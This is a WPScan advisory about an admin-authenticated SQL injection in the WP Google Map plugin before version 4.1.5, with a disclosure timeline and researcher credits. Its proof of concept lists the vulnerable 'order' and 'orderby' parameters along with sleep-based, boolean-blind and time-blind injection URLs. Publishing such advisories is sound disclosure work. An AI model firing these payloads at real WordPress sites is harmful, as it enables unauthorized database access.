WordPress Plugin Vulnerabilities
WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection
Description
The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+).
Edit (WPScanTeam):
September 8th, 2020 - Confirmed & Escalated to WP plugins team
September 8th, 2020 - WP plugins team investigating
November 25th, 2020 - No updates, disclosing
December 8th, 2020 - v4.1.4 released, issue still present (improper fix)
January 27th, 2021 - v4.1.5 released, fixing the issue
Proof of Concept
- Vulnerable parameters: `order` and `orderby`
1. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query:
https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=desc&orderby=(sleep(5))
2. The request will be delayed by 10 seconds.
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END)
---
Affects Plugins
Fixed in 4.1.5 References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-11-25 (about 3 years ago)
Added
2020-11-25 (about 3 years ago)
Last Updated
2021-02-01 (about 2 years ago)
WPScan 